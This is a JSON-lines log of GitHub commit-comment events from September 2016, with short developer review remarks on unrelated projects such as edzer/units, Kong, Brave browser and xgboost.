{"id":"4563910507","type":"CommitCommentEvent","actor":{"login":"edzer"},"repo":{"name":"edzer/units"},"payload":{"comment":{"id":19024895,"position":4,"line":24,"path":"NAMESPACE","commit_id":"69bc1e7eeaac4a7fdc223b34d59035a7ad7e1346","created_at":"2016-09-14T18:59:34Z","updated_at":"2016-09-14T18:59:34Z","body":"Why would you use units without loading it first?"}},"created_at":"2016-09-14T18:59:34Z"}
{"id":"4563911175","type":"CommitCommentEvent","actor":{"login":"dngreenst"},"repo":{"name":"SpartanRefactoring/Spartanizer"},"payload":{"comment":{"id":19024896,"position":null,"line":null,"path":null,"commit_id":"e7c57e5de4dd9fd9ca7c028d82fc46ad5a834fdb","created_at":"2016-09-14T18:59:41Z","updated_at":"2016-09-14T18:59:41Z","body":"@yossigil , did you mean type names, and not identifiers? Our renaming wrings, as far as I can see, the only point in which a variable's identifier is considered during the renaming process, is whether or not the variable should be renamed. \r\n\r\nIf you did mean type names, and not identifiers, I fail to see where we differ. Could you add an example of a variable declaration that is shortened in a different way then you intended?"}},"created_at":"2016-09-14T18:59:41Z"}
{"id":"4563912949","type":"CommitCommentEvent","actor":{"login":"brasmusson"},"repo":{"name":"cucumber/cucumber-jvm"},"payload":{"comment":{"id":19024901,"position":20,"line":28,"path":".travis.yml","commit_id":"4201a1d354a41008e9d0a07fcda3f44ba1b5b4ba","created_at":"2016-09-14T19:00:01Z","updated_at":"2016-09-14T19:00:01Z","body":"@aslakhellesoy Removing this means that snaphot-releases cannot be deployed to sonatype, is that intentional?"}},"created_at":"2016-09-14T19:00:01Z"}
{"id":"4563913842","type":"CommitCommentEvent","actor":{"login":"9Lukas5"},"repo":{"name":"TheMuppets/proprietary_vendor_htc"},"payload":{"comment":{"id":19024903,"position":null,"line":null,"path":null,"commit_id":"da841d8c6d8d9404cb344ae1ddd05ea32923ce0c","created_at":"2016-09-14T19:00:14Z","updated_at":"2016-09-14T19:00:14Z","body":"Hey, could you please revert the m7-common/proprietary/lib/libloc_api_v02.so to the version before this commit, as this breaks GPS?"}},"created_at":"2016-09-14T19:00:14Z"}
{"id":"4563914210","type":"CommitCommentEvent","actor":{"login":"monicao"},"repo":{"name":"nataliemok/week2"},"payload":{"comment":{"id":19024905,"position":7,"line":7,"path":"w2d1/get_avatarURL.js","commit_id":"d25109bdaeb224764c4fe48f1dd4220e7e255fa8","created_at":"2016-09-14T19:00:18Z","updated_at":"2016-09-14T19:00:18Z","body":"In the requirements there is no fourth parameter. the program takes two parameters: owner and repo. It seems you are using the fourth parameter to allow the user to name of the folder to store the images into.\r\n\r\nThat's fine. According to the original requirements, I think the images are supposed to be saved into a folder called `avatars`.\r\n\r\nSuggestion: Rename the variable to `folderName` since the variable is actually the name of a folder. "}},"created_at":"2016-09-14T19:00:18Z"}
{"id":"4563918663","type":"CommitCommentEvent","actor":{"login":"monicao"},"repo":{"name":"nataliemok/week2"},"payload":{"comment":{"id":19024916,"position":38,"line":38,"path":"w2d1/getContributorsExport.js","commit_id":"d25109bdaeb224764c4fe48f1dd4220e7e255fa8","created_at":"2016-09-14T19:01:04Z","updated_at":"2016-09-14T19:01:04Z","body":"fix indentation. \r\n\r\nboth variables can be declared as const because they are not modified in this function."}},"created_at":"2016-09-14T19:01:04Z"}
{"id":"4563918717","type":"CommitCommentEvent","actor":{"login":"cssjoe"},"repo":{"name":"BoldGrid/boldgrid-theme-framework"},"payload":{"comment":{"id":19024917,"position":4,"line":22,"path":"boldgrid-theme-framework/includes/configs/configs.php","commit_id":"1305922b2e5261d25fdac9d21b6811ea55aadac1","created_at":"2016-09-14T19:01:05Z","updated_at":"2016-09-14T19:01:05Z","body":"Array dereference is a syntax error in PHP 5.3."}},"created_at":"2016-09-14T19:01:05Z"}
{"id":"4563919130","type":"CommitCommentEvent","actor":{"login":"cssjoe"},"repo":{"name":"BoldGrid/boldgrid-theme-framework"},"payload":{"comment":{"id":19024918,"position":4,"line":22,"path":"src/includes/configs/configs.php","commit_id":"1305922b2e5261d25fdac9d21b6811ea55aadac1","created_at":"2016-09-14T19:01:10Z","updated_at":"2016-09-14T19:01:10Z","body":"Array dereference is a syntax error in PHP 5.3."}},"created_at":"2016-09-14T19:01:10Z"}
{"id":"4563924574","type":"CommitCommentEvent","actor":{"login":"kerphi"},"repo":{"name":"Inist-CNRS/ezmaster"},"payload":{"comment":{"id":19024927,"position":105,"line":53,"path":"helpers/app.js","commit_id":"2b3f2194315eeff6806a25a4ca28815c433d8205","created_at":"2016-09-14T19:02:13Z","updated_at":"2016-09-14T19:02:13Z","body":"en effet ...\n\nLe mer. 14 sept. 2016 à 17:48, François Parmentier <notifications@github.com>\na écrit :\n\n> Ça veut dire que si on a moins d'images que de fichiers JSON dans le\n> répertoire applications, la callback n'est jamais appelée?!?\n>\n> Si jamais une image a été supprimée à la main...\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/Inist-CNRS/ezmaster/commit/2b3f2194315eeff6806a25a4ca28815c433d8205#commitcomment-19021412>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAUCNFI2jva3FtbhZqeo85ahDejNh6W8ks5qqBc0gaJpZM4J87gZ>\n> .\n>\n"}},"created_at":"2016-09-14T19:02:13Z"}
{"id":"4563925018","type":"CommitCommentEvent","actor":{"login":"slambert"},"repo":{"name":"jamiew/capitalismworksfor.me"},"payload":{"comment":{"id":19024929,"position":null,"line":null,"path":null,"commit_id":"7cdfa4f54053773dc9b1e5d1b3bab64fcfe3cdd2","created_at":"2016-09-14T19:02:18Z","updated_at":"2016-09-14T19:02:18Z","body":"Thanks! So this includes the files, but it still needs to be added to the CSS right? Where do I access the CSS on this here thing? "}},"created_at":"2016-09-14T19:02:18Z"}
{"id":"4563926422","type":"CommitCommentEvent","actor":{"login":"monicao"},"repo":{"name":"nataliemok/week2"},"payload":{"comment":{"id":19024933,"position":23,"line":23,"path":"w2d1/getContributorsExport.js","commit_id":"d25109bdaeb224764c4fe48f1dd4220e7e255fa8","created_at":"2016-09-14T19:02:32Z","updated_at":"2016-09-14T19:02:32Z","body":"Question: Why did you have to remove the non-digit characters? What did the original status string look like?\r\n\r\n"}},"created_at":"2016-09-14T19:02:32Z"}
{"id":"4563929320","type":"CommitCommentEvent","actor":{"login":"monicao"},"repo":{"name":"nataliemok/week2"},"payload":{"comment":{"id":19024938,"position":25,"line":25,"path":"w2d1/getContributorsExport.js","commit_id":"d25109bdaeb224764c4fe48f1dd4220e7e255fa8","created_at":"2016-09-14T19:03:06Z","updated_at":"2016-09-14T19:03:06Z","body":"The `==` works just fine. Question: why does it work?"}},"created_at":"2016-09-14T19:03:06Z"}
{"id":"4563931135","type":"CommitCommentEvent","actor":{"login":"bridiver"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":19024943,"position":5,"line":425,"path":"js/state/siteUtil.js","commit_id":"7f1354b3eff96389fac917c7020a22d06b641984","created_at":"2016-09-14T19:03:26Z","updated_at":"2016-09-14T19:03:26Z","body":"it comes from chrome as `file:///`"}},"created_at":"2016-09-14T19:03:26Z"}
{"id":"4563935579","type":"CommitCommentEvent","actor":{"login":"femnad"},"repo":{"name":"femnad/tbd"},"payload":{"comment":{"id":19024951,"position":14,"line":28,"path":"constants.hrl","commit_id":"759e1117b046c6f7f6d099165400d429b93064c5","created_at":"2016-09-14T19:04:17Z","updated_at":"2016-09-14T19:04:17Z","body":"Would it make sense if this record contained a field for frame delimiter too."}},"created_at":"2016-09-14T19:04:17Z"}
{"id":"4563935605","type":"CommitCommentEvent","actor":{"login":"CodingCat"},"repo":{"name":"dmlc/xgboost"},"payload":{"comment":{"id":19024950,"position":null,"line":null,"path":null,"commit_id":"fb02797e2ac3ea41f52facb3469926575c4d63cb","created_at":"2016-09-14T19:04:17Z","updated_at":"2016-09-14T19:04:17Z","body":"@tanwanirahul , if you decide to contribute to params implementation, please let me know ASAP, otherwise, I will start working on it after tmr"}},"created_at":"2016-09-14T19:04:17Z"}
{"id":"4563935730","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19024952,"position":null,"line":null,"path":null,"commit_id":"c8eada605e94b85d6e2de4f4e2f358aa30d33e83","created_at":"2016-09-14T19:04:19Z","updated_at":"2016-09-14T19:04:19Z","body":"EMS (brianlball) - x86_64-Linux-Ubuntu-14.04-clang-3.5: OK (2285 of 2470 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-c8eada605e94b85d6e2de4f4e2f358aa30d33e83-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-c8eada605e94b85d6e2de4f4e2f358aa30d33e83-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-92.51%25-yellow.svg)</a> \n"}},"created_at":"2016-09-14T19:04:19Z"}
{"id":"4563942576","type":"CommitCommentEvent","actor":{"login":"Iamblichos"},"repo":{"name":"LoneGazebo/Community-Patch-DLL"},"payload":{"comment":{"id":19024963,"position":null,"line":null,"path":null,"commit_id":"b99e5c1f5f1c91b227b62ba1ba4384a4aea9cc36","created_at":"2016-09-14T19:05:33Z","updated_at":"2016-09-14T19:05:33Z","body":"I'm ready whenever you guys are."}},"created_at":"2016-09-14T19:05:33Z"}
{"id":"4563951473","type":"CommitCommentEvent","actor":{"login":"deads2k"},"repo":{"name":"openshift/origin"},"payload":{"comment":{"id":19024990,"position":null,"line":null,"path":null,"commit_id":"7a846d24a35870650863cf40a3455cc4de7961ea","created_at":"2016-09-14T19:07:06Z","updated_at":"2016-09-14T19:07:06Z","body":"boring"}},"created_at":"2016-09-14T19:07:06Z"}
{"id":"4563953969","type":"CommitCommentEvent","actor":{"login":"deads2k"},"repo":{"name":"openshift/origin"},"payload":{"comment":{"id":19024997,"position":null,"line":null,"path":null,"commit_id":"ea0eef414f4cf1f44bb321f855d71c013f543389","created_at":"2016-09-14T19:07:36Z","updated_at":"2016-09-14T19:07:36Z","body":"boring"}},"created_at":"2016-09-14T19:07:36Z"}
{"id":"4563957962","type":"CommitCommentEvent","actor":{"login":"kerphi"},"repo":{"name":"Inist-CNRS/ezmaster"},"payload":{"comment":{"id":19025007,"position":5,"line":83,"path":"views/layout.html","commit_id":"7fbddbc48bcc71b84eec9be67f465e19b9b0c585","created_at":"2016-09-14T19:08:21Z","updated_at":"2016-09-14T19:08:21Z","body":"au niveau convention d'écriture, c'est plutot ezMaster qu'il faut écrire de partout ? ou bien on reste sur ezmaster ? \r\nc'était il me semble ezmaster sur lequel on convergeait ?"}},"created_at":"2016-09-14T19:08:21Z"}
{"id":"4563958271","type":"CommitCommentEvent","actor":{"login":"skapix"},"repo":{"name":"skapix/mmcs-sfedu_compiler"},"payload":{"comment":{"id":19025008,"position":10,"line":11,"path":"Nodes.cs","commit_id":"475af67ed59bf4bd22126d9f611588d87917bb77","created_at":"2016-09-14T19:08:25Z","updated_at":"2016-09-14T19:08:25Z","body":"а какие ещё варианты? Мы только с целочисленными работаем\r\nНадо будет сделать int/bool ноды\r\nи вместо getValue нужен визитор, как http://it.mmcs.sfedu.ru/wiki/Посетитель_(Visitor)\r\n"}},"created_at":"2016-09-14T19:08:25Z"}
{"id":"4563959151","type":"CommitCommentEvent","actor":{"login":"bridiver"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":19025009,"position":5,"line":425,"path":"js/state/siteUtil.js","commit_id":"7f1354b3eff96389fac917c7020a22d06b641984","created_at":"2016-09-14T19:08:34Z","updated_at":"2016-09-14T19:08:34Z","body":"just double-checked to be 100% sure"}},"created_at":"2016-09-14T19:08:34Z"}
{"id":"4563960566","type":"CommitCommentEvent","actor":{"login":"dreness"},"repo":{"name":"georgalis/ccs-calendarserver"},"payload":{"comment":{"id":19025012,"position":null,"line":null,"path":null,"commit_id":"1bda025b743a333438cc984208560f6bf889b36c","created_at":"2016-09-14T19:08:50Z","updated_at":"2016-09-14T19:08:50Z","body":"Hi George,\r\n\r\nJust wanted to give you a quick heads up that we are looking at abstracting a lot of this 'develop' stuff away from the user, such that 'pip install calendarserver' does everything that is needed, including c deps. I mention this incase you are planning to request integration of this or related changes into the main CalendarServer repo, to hopefully save you from doing more work that is obsoleted by a (possibly, hopefully) upcoming change.\r\n\r\nCheers,\r\n-dre"}},"created_at":"2016-09-14T19:08:50Z"}
{"id":"4563961375","type":"CommitCommentEvent","actor":{"login":"monicao"},"repo":{"name":"nataliemok/week2"},"payload":{"comment":{"id":19025016,"position":4,"line":13,"path":"w2d1/package.json","commit_id":"e0a703c7fa0cd2d8afceea1dd18f18e80cc7c97f","created_at":"2016-09-14T19:08:59Z","updated_at":"2016-09-14T19:08:59Z","body":"All the packages should be part of the `dependencies` group, because they are all required to run the program. `devDependencies` is just for packages that are only required when your are developing the code."}},"created_at":"2016-09-14T19:08:59Z"}
{"id":"4563969257","type":"CommitCommentEvent","actor":{"login":"Simn"},"repo":{"name":"HaxeFoundation/haxe"},"payload":{"comment":{"id":19025030,"position":null,"line":null,"path":null,"commit_id":"a9c2ac1fcb67f7d467fcf9b07dd1fa9b02bad47d","created_at":"2016-09-14T19:10:29Z","updated_at":"2016-09-14T19:10:29Z","body":"I'm probably being annoying, but I really didn't like having two error functions with the same signature around. Depending on import order things would behave very different, such as Typecore.Error (now Error.Error) being caught and recovered from in several places whereas Common.error would just always bail out completely."}},"created_at":"2016-09-14T19:10:29Z"}
{"id":"4563970552","type":"CommitCommentEvent","actor":{"login":"leonx075"},"repo":{"name":"Geekavenger/RIIDesign"},"payload":{"comment":{"id":19025033,"position":null,"line":null,"path":null,"commit_id":"9673508a944edfc370416c22a122b2e31c7facd0","created_at":"2016-09-14T19:10:43Z","updated_at":"2016-09-14T19:10:43Z","body":"very nice! thanks Ross. Remember that the only thing missing for energy is the \"other fuels\" for which I'm working as fast as I can to complete. It should be easy to add this at the end, to the very last view."}},"created_at":"2016-09-14T19:10:43Z"}
{"id":"4563976523","type":"CommitCommentEvent","actor":{"login":"chenghlee"},"repo":{"name":"lab7/biobuilds"},"payload":{"comment":{"id":19025048,"position":null,"line":null,"path":null,"commit_id":"91e43ac6afeb1031d244b7dcdf0cc515ed9013c5","created_at":"2016-09-14T19:11:52Z","updated_at":"2016-09-14T19:11:52Z","body":"Just pushed a Dockerfile that essentially re-generates the \"lab7io/build:biobuilds\" image (commit 3a9a39b).\r\n\r\nAs noted in the commit message, I'm saying \"essentially\" because the actual Dockerfile uses an internal (private) image that isn't available on Docker Hub; however, aside from \"FROM\" and \"MAINTAINER\" commands, the sequence of commands in the committed Dockerfile is identical to the commands used to generate the Docker Hub image."}},"created_at":"2016-09-14T19:11:52Z"}
{"id":"4563977177","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19025049,"position":null,"line":null,"path":null,"commit_id":"c8eada605e94b85d6e2de4f4e2f358aa30d33e83","created_at":"2016-09-14T19:12:01Z","updated_at":"2016-09-14T19:12:01Z","body":"EMS (brianlball) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-c8eada605e94b85d6e2de4f4e2f358aa30d33e83-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a>  \n"}},"created_at":"2016-09-14T19:12:01Z"}
{"id":"4563978195","type":"CommitCommentEvent","actor":{"login":"danigb"},"repo":{"name":"danigb/audio-loader"},"payload":{"comment":{"id":19025050,"position":5,"line":5,"path":"lib/load.js","commit_id":"8abb7dfbbeb2d065278687559b32464fa7e28383","created_at":"2016-09-14T19:12:15Z","updated_at":"2016-09-14T19:12:15Z","body":"This is my first attempt to reduce the dist file. Also this is legacy code of the first approach to use node. I'll remove it."}},"created_at":"2016-09-14T19:12:15Z"}
{"id":"4563979700","type":"CommitCommentEvent","actor":{"login":"samgoeta"},"repo":{"name":"okfn/opendatahandbook"},"payload":{"comment":{"id":19025052,"position":null,"line":null,"path":null,"commit_id":"1e173e48a44112c9d7d3e091595769825f9536f5","created_at":"2016-09-14T19:12:30Z","updated_at":"2016-09-14T19:12:30Z","body":"Ok, great but I don't see the article on the website"}},"created_at":"2016-09-14T19:12:30Z"}
{"id":"4563980928","type":"CommitCommentEvent","actor":{"login":"danigb"},"repo":{"name":"danigb/audio-loader"},"payload":{"comment":{"id":19025059,"position":14,"line":7,"path":"test/node-test.js","commit_id":"8abb7dfbbeb2d065278687559b32464fa7e28383","created_at":"2016-09-14T19:12:44Z","updated_at":"2016-09-14T19:12:44Z","body":"Understood 👍 "}},"created_at":"2016-09-14T19:12:44Z"}
{"id":"4563982455","type":"CommitCommentEvent","actor":{"login":"danigb"},"repo":{"name":"danigb/audio-loader"},"payload":{"comment":{"id":19025063,"position":21,"line":13,"path":"test/node-test.js","commit_id":"8abb7dfbbeb2d065278687559b32464fa7e28383","created_at":"2016-09-14T19:12:56Z","updated_at":"2016-09-14T19:12:56Z","body":"I'll try\r\n"}},"created_at":"2016-09-14T19:12:56Z"}
{"id":"4563984497","type":"CommitCommentEvent","actor":{"login":"monicao"},"repo":{"name":"nataliemok/week2"},"payload":{"comment":{"id":19025070,"position":5,"line":5,"path":"w2d1/get_avatarURL.js","commit_id":"d25109bdaeb224764c4fe48f1dd4220e7e255fa8","created_at":"2016-09-14T19:13:22Z","updated_at":"2016-09-14T19:13:22Z","body":"repo and owner are not being used here."}},"created_at":"2016-09-14T19:13:22Z"}
{"id":"4563986149","type":"CommitCommentEvent","actor":{"login":"CodingCat"},"repo":{"name":"dmlc/xgboost"},"payload":{"comment":{"id":19025075,"position":null,"line":null,"path":null,"commit_id":"fb02797e2ac3ea41f52facb3469926575c4d63cb","created_at":"2016-09-14T19:13:41Z","updated_at":"2016-09-14T19:13:41Z","body":"@tanwanirahul , for your question about release management,\r\n\r\nJVM APIs are subject to change in recent releases, basically, jvm-packages 0.5 is released in xgboost 0.6 because we skipped XGBoost 0.5....\r\n\r\nThere will be the incompatible change from 0.6 to 0.7 due to the reasons I mentioned above\r\n\r\nSorry for any inconvenience "}},"created_at":"2016-09-14T19:13:41Z"}
{"id":"4563988514","type":"CommitCommentEvent","actor":{"login":"tlacoyodefrijol"},"repo":{"name":"okfn/opendatahandbook"},"payload":{"comment":{"id":19025082,"position":null,"line":null,"path":null,"commit_id":"1e173e48a44112c9d7d3e091595769825f9536f5","created_at":"2016-09-14T19:14:09Z","updated_at":"2016-09-14T19:14:09Z","body":"@samgoeta I need to add it to the general structure still. It'll be up soon. "}},"created_at":"2016-09-14T19:14:09Z"}
{"id":"4563988652","type":"CommitCommentEvent","actor":{"login":"sobychacko"},"repo":{"name":"mbogoevici/spring-cloud-stream-binder-kafka"},"payload":{"comment":{"id":19025083,"position":null,"line":null,"path":null,"commit_id":"002cd99c0ea7c3f30cb246d6e6a499f52f3585a1","created_at":"2016-09-14T19:14:10Z","updated_at":"2016-09-14T19:14:10Z","body":"LGTM - do we need @ConditionalOnClass at two places? one on the Condition implementation and the other on the @Bean. "}},"created_at":"2016-09-14T19:14:10Z"}
{"id":"4563991197","type":"CommitCommentEvent","actor":{"login":"thibaultcha"},"repo":{"name":"Mashape/kong"},"payload":{"comment":{"id":19025090,"position":6,"line":308,"path":"kong/plugins/request-transformer/access.lua","commit_id":"bd8f0f060e3c2713398d09c93a0a43c04f697f0d","created_at":"2016-09-14T19:14:40Z","updated_at":"2016-09-14T19:14:40Z","body":"There should be an extra check here. I think relying on the plugin's schema is not enough. Like:\r\n```lua\r\nlocal method = conf.http_method:upper()\r\nlocal ngx_method = ngx[\"HTTP_\"..method]\r\nif not ngx_method then\r\n  ngx.log(ngx.ERR, \"[request-transformer] not HTTP method constant for HTTP method '\", method, \"'\")\r\n  ngx.exit(500) -- or return, or anything else\r\nend\r\n```"}},"created_at":"2016-09-14T19:14:40Z"}
{"id":"4563994445","type":"CommitCommentEvent","actor":{"login":"Nyks45"},"repo":{"name":"Nyks45/OctoDex-Kernel"},"payload":{"comment":{"id":19025096,"position":null,"line":null,"path":null,"commit_id":"968b91634131ffac1b2d82810be4fe4e74337193","created_at":"2016-09-14T19:15:18Z","updated_at":"2016-09-14T19:15:18Z","body":"@eoghan2t9"}},"created_at":"2016-09-14T19:15:18Z"}
{"id":"4563994486","type":"CommitCommentEvent","actor":{"login":"krlmlr"},"repo":{"name":"edzer/units"},"payload":{"comment":{"id":19025097,"position":4,"line":24,"path":"NAMESPACE","commit_id":"69bc1e7eeaac4a7fdc223b34d59035a7ad7e1346","created_at":"2016-09-14T19:15:19Z","updated_at":"2016-09-14T19:15:19Z","body":"Somebody else's code might have created a units object which I'm consuming, without attaching the units package.\r\n\r\nSee https://github.com/hannesmuehleisen/MonetDBLite/blob/876df45fcf9d1a9077133098e0618617a63d6862/R/dplyr.R#L5 for @hannesmuehleisen's approach to provide S3 methods without importing the package that defines the generic. In our application you'd implement .onLoad() and install the handler if the hms package is loaded."}},"created_at":"2016-09-14T19:15:19Z"}
{"id":"4563995973","type":"CommitCommentEvent","actor":{"login":"kerphi"},"repo":{"name":"istex/istex-google-scholar"},"payload":{"comment":{"id":19025102,"position":18,"line":31,"path":"main.js","commit_id":"e5f8dc5163e8f84c0bb69716f2f9191d2c831c23","created_at":"2016-09-14T19:15:32Z","updated_at":"2016-09-14T19:15:32Z","body":"Pour être plus \"générique\", peut-être plutôt utiliser un truc du genre { proxy: process.env.http_proxy } ?"}},"created_at":"2016-09-14T19:15:32Z"}
{"id":"4563996665","type":"CommitCommentEvent","actor":{"login":"edzer"},"repo":{"name":"edzer/units"},"payload":{"comment":{"id":19025105,"position":4,"line":24,"path":"NAMESPACE","commit_id":"69bc1e7eeaac4a7fdc223b34d59035a7ad7e1346","created_at":"2016-09-14T19:15:39Z","updated_at":"2016-09-14T19:15:39Z","body":"OK, import hms, here you are https://github.com/edzer/units/commit/24f1b61e86e7338fec74482651cb1c5b3c1504e6"}},"created_at":"2016-09-14T19:15:39Z"}
{"id":"4563999045","type":"CommitCommentEvent","actor":{"login":"samgoeta"},"repo":{"name":"okfn/opendatahandbook"},"payload":{"comment":{"id":19025109,"position":null,"line":null,"path":null,"commit_id":"1e173e48a44112c9d7d3e091595769825f9536f5","created_at":"2016-09-14T19:16:08Z","updated_at":"2016-09-14T19:16:08Z","body":"Ok, thanks!\n\n-- \nSamuel Goëta | +33646746441 | @samgoeta\n\n> Le 14 sept. 2016 à 21:14, Oscar Montiel <notifications@github.com> a écrit :\n> \n> @samgoeta I need to add it to the general structure still. It'll be up soon.\n> \n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub, or mute the thread.\n> \n"}},"created_at":"2016-09-14T19:16:08Z"}
{"id":"4563999552","type":"CommitCommentEvent","actor":{"login":"mbogoevici"},"repo":{"name":"mbogoevici/spring-cloud-stream-binder-kafka"},"payload":{"comment":{"id":19025112,"position":null,"line":null,"path":null,"commit_id":"002cd99c0ea7c3f30cb246d6e6a499f52f3585a1","created_at":"2016-09-14T19:16:13Z","updated_at":"2016-09-14T19:16:13Z","body":"Oh, I missed that we have conditionals on condition - that doesn't really do anything helpful.\r\n"}},"created_at":"2016-09-14T19:16:13Z"}
{"id":"4564000083","type":"CommitCommentEvent","actor":{"login":"myabc"},"repo":{"name":"rubyberlin/rubyberlin.org"},"payload":{"comment":{"id":19025115,"position":null,"line":null,"path":null,"commit_id":"37dc78550dbfea5c8682062874dcc9b1f24151ff","created_at":"2016-09-14T19:16:18Z","updated_at":"2016-09-14T19:16:18Z","body":"@bascht FYI, this still needs to be deployed."}},"created_at":"2016-09-14T19:16:18Z"}
{"id":"4564003361","type":"CommitCommentEvent","actor":{"login":"bhj"},"repo":{"name":"davezuko/react-redux-starter-kit"},"payload":{"comment":{"id":19025124,"position":null,"line":null,"path":null,"commit_id":"f00ebd3775ec5b9cbbfd9777f37700433ddb1631","created_at":"2016-09-14T19:16:54Z","updated_at":"2016-09-14T19:16:54Z","body":"@davezuko Thanks and 100% support the philosophy. Maybe in a year or two we can finally use async/await properly!"}},"created_at":"2016-09-14T19:16:54Z"}
{"id":"4564006652","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19025130,"position":null,"line":null,"path":null,"commit_id":"91c07c5227361ac051e7c27ef468aacea711c677","created_at":"2016-09-14T19:17:31Z","updated_at":"2016-09-14T19:17:31Z","body":"makingPrettyTransition (mitchute) - x86_64-MacOS-10.9-clang: OK (2322 of 2329 tests passed, 24 test warnings)\n\n * 10 tests had: AUD diffs.\n * 31 tests had: ERR diffs.\n * 7 tests had: Table big diffs.\n * 21 tests had: EIO diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-91c07c5227361ac051e7c27ef468aacea711c677-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-91c07c5227361ac051e7c27ef468aacea711c677-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.7%25-yellow.svg)</a> \n"}},"created_at":"2016-09-14T19:17:31Z"}
{"id":"4564007416","type":"CommitCommentEvent","actor":{"login":"olivergondza"},"repo":{"name":"jenkinsci/cloud-stats-plugin"},"payload":{"comment":{"id":19025133,"position":18,"line":43,"path":"src/main/java/org/jenkinsci/plugins/cloudstats/TrackedItem.java","commit_id":"cfb26a1b5ebaa8243451ca2862c78860b00d1a4d","created_at":"2016-09-14T19:17:39Z","updated_at":"2016-09-14T19:17:39Z","body":"Is there any conflict in particular? I agree, though it is a bit late to change this now easily."}},"created_at":"2016-09-14T19:17:39Z"}
{"id":"4564008410","type":"CommitCommentEvent","actor":{"login":"Vaelatern"},"repo":{"name":"voidlinux/void-packages"},"payload":{"comment":{"id":19025134,"position":null,"line":null,"path":null,"commit_id":"df499fc6e157403bd5493218dd7d81067e1e1418","created_at":"2016-09-14T19:17:50Z","updated_at":"2016-09-14T19:17:50Z","body":"It is discouraged to add `nocross` in event that the cross building error is only due to a dependency. If the dependency is fixed or compiled in some way, packages depending on it should not have the same restrictions without cause."}},"created_at":"2016-09-14T19:17:50Z"}
{"id":"4564009335","type":"CommitCommentEvent","actor":{"login":"daspilker"},"repo":{"name":"jenkinsci/job-dsl-plugin"},"payload":{"comment":{"id":19025136,"position":null,"line":null,"path":null,"commit_id":"7226eb1a0d609eb16174ee9618cd93abd209706d","created_at":"2016-09-14T19:18:01Z","updated_at":"2016-09-14T19:18:01Z","body":"Ah, it was actually 2016.1. See http://mrhaki.blogspot.de/2016/03/gradle-goodness-source-sets-as-intellij.html. Without this change, the `jobs` source set has no dependencies."}},"created_at":"2016-09-14T19:18:01Z"}
{"id":"4564013020","type":"CommitCommentEvent","actor":{"login":"AdityaKhandkar"},"repo":{"name":"GideonBuckwalter/robot-arm-controller"},"payload":{"comment":{"id":19025149,"position":null,"line":null,"path":null,"commit_id":"365ee285eb80abe26c65162953f86c9b12f78d0c","created_at":"2016-09-14T19:18:42Z","updated_at":"2016-09-14T19:18:42Z","body":"woah!\r\nLooks like you're doing a lot of stuff in it!"}},"created_at":"2016-09-14T19:18:42Z"}
{"id":"4564015782","type":"CommitCommentEvent","actor":{"login":"lvandeve"},"repo":{"name":"lvandeve/lodepng"},"payload":{"comment":{"id":19025158,"position":null,"line":null,"path":null,"commit_id":"ac8f8863c609f34b69d629ed72d6a234afeb11d5","created_at":"2016-09-14T19:19:13Z","updated_at":"2016-09-14T19:19:13Z","body":"This was to make it more consistent with the other header file that used guards.\r\n\r\nPragma not at the top was probably an oversight."}},"created_at":"2016-09-14T19:19:13Z"}
{"id":"4564020594","type":"CommitCommentEvent","actor":{"login":"ISuckAtPython"},"repo":{"name":"ktbyers/netmiko"},"payload":{"comment":{"id":19025171,"position":null,"line":null,"path":null,"commit_id":"2c590de6331091ca6563d198f5b2c2b7cd4ebbf5","created_at":"2016-09-14T19:20:05Z","updated_at":"2016-09-14T19:20:05Z","body":"@ktbyers I am curious if I need to do anything special to utilize netmiko 1.0. I cloned the new repo and changed my netmiko scripts to use send_command_timing() for running commands over SSH, but I am getting an error saying that the attribute send_command_timing doesn't exist. For example:\r\n\r\n```\r\noutput = net_connect.send_command_timing(\"display route-static routing-table\")\r\nAttributeError: 'HPComwareSSH' object has no attribute 'send_command_timing'\r\n```\r\n\r\nForgive me if I am missing an easy step, I am new to Github. Do I need to run any additional commands to use the 1.0 version of netmiko or am I already using it? Thanks!"}},"created_at":"2016-09-14T19:20:05Z"}
{"id":"4564027002","type":"CommitCommentEvent","actor":{"login":"diracdeltas"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":19025183,"position":5,"line":425,"path":"js/state/siteUtil.js","commit_id":"7f1354b3eff96389fac917c7020a22d06b641984","created_at":"2016-09-14T19:21:17Z","updated_at":"2016-09-14T19:21:17Z","body":"just mentioning it for consistency because `getOrigin` doesn't return trailing slashes in origins whereas chrome does. it's not a big deal either way since https://tools.ietf.org/html/rfc6454#section-3.2.1 specifically allows `file://` origins to be implementation-specific"}},"created_at":"2016-09-14T19:21:17Z"}
